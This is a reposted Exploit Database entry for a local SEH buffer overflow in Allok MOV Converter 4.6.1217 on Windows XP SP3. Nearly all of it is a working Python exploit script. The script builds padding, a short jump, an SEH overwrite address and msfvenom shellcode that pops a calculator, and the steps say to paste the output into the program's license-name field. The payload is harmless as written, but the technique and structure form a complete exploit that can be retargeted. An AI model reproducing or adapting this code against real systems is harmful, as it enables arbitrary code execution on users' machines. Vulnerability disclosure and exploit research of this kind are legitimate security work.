Allok MOV Converter 4.6.1217 – Buffer Overflow (SEH)

• Exploit Database
• 13 阅读

• 作者： Shubham Singh
  日期： 2018-07-30
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/45101/

• # Exploit Title: Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)
  # Date: 2018-07-29
  # Discovery by: Shubham Singh
  # Known As: Spirited Wolf [Twitter: @Pwsecspirit]
  # Software Link: http://www.alloksoft.com/allok_movconverter.exe
  # Tested Version: 4.6.1217
  # Tested on OS: Windows XP Service Pack 3 x86
  # Greetz: @hexachordanu @FuzzySec @LiveOverflow
  
  # Steps to Reproduce: Run the python exploit script, it will create a new 
  # file with the name "exploit.txt" just copy the text inside "exploit.txt"
  # Start the Allok MOV Converter 4.6.1217 program and in the Lisence name paste the content of "exploit.txt" and click on Register.
  # You will see a sweet calculator poped up.
  
  file = open("exploit.txt","wb")
  junk = "\x41" * 780
  nseh = "\xeb\x10\x90\x90" #Short Jump address
  seh = "\x79\x25\x01\x76"#0x76012579
  
  nops = "\x90" * 16
  
  #badchar \x00\x08\x09\x0a\x0b\x0c\x0d
  #msfvenom -p windows/exec CMD=calc.exe -b '\x00\x08\x09\x0a\x0b\x0c\x0d' -f python
  buf =""
  buf += "\xba\xbb\xf0\xaa\x11\xdd\xc3\xd9\x74\x24\xf4\x5e\x31"
  buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xb4\x12"
  buf += "\x5f\xed\x22\x50\xa0\x0e\xb2\x35\x28\xeb\x83\x75\x4e"
  buf += "\x7f\xb3\x45\x04\x2d\x3f\x2d\x48\xc6\xb4\x43\x45\xe9"
  buf += "\x7d\xe9\xb3\xc4\x7e\x42\x87\x47\xfc\x99\xd4\xa7\x3d"
  buf += "\x52\x29\xa9\x7a\x8f\xc0\xfb\xd3\xdb\x77\xec\x50\x91"
  buf += "\x4b\x87\x2a\x37\xcc\x74\xfa\x36\xfd\x2a\x71\x61\xdd"
  buf += "\xcd\x56\x19\x54\xd6\xbb\x24\x2e\x6d\x0f\xd2\xb1\xa7"
  buf += "\x5e\x1b\x1d\x86\x6f\xee\x5f\xce\x57\x11\x2a\x26\xa4"
  buf += "\xac\x2d\xfd\xd7\x6a\xbb\xe6\x7f\xf8\x1b\xc3\x7e\x2d"
  buf += "\xfd\x80\x8c\x9a\x89\xcf\x90\x1d\x5d\x64\xac\x96\x60"
  buf += "\xab\x25\xec\x46\x6f\x6e\xb6\xe7\x36\xca\x19\x17\x28"
  buf += "\xb5\xc6\xbd\x22\x5b\x12\xcc\x68\x31\xe5\x42\x17\x77"
  buf += "\xe5\x5c\x18\x27\x8e\x6d\x93\xa8\xc9\x71\x76\x8d\x26"
  buf += "\x38\xdb\xa7\xae\xe5\x89\xfa\xb2\x15\x64\x38\xcb\x95"
  buf += "\x8d\xc0\x28\x85\xe7\xc5\x75\x01\x1b\xb7\xe6\xe4\x1b"
  buf += "\x64\x06\x2d\x78\xeb\x94\xad\x51\x8e\x1c\x57\xae"
  
  more = "\x41" * 100
  exploit = junk + nseh + seh + nops + buf + more
  
  file.write(exploit)
  file.close()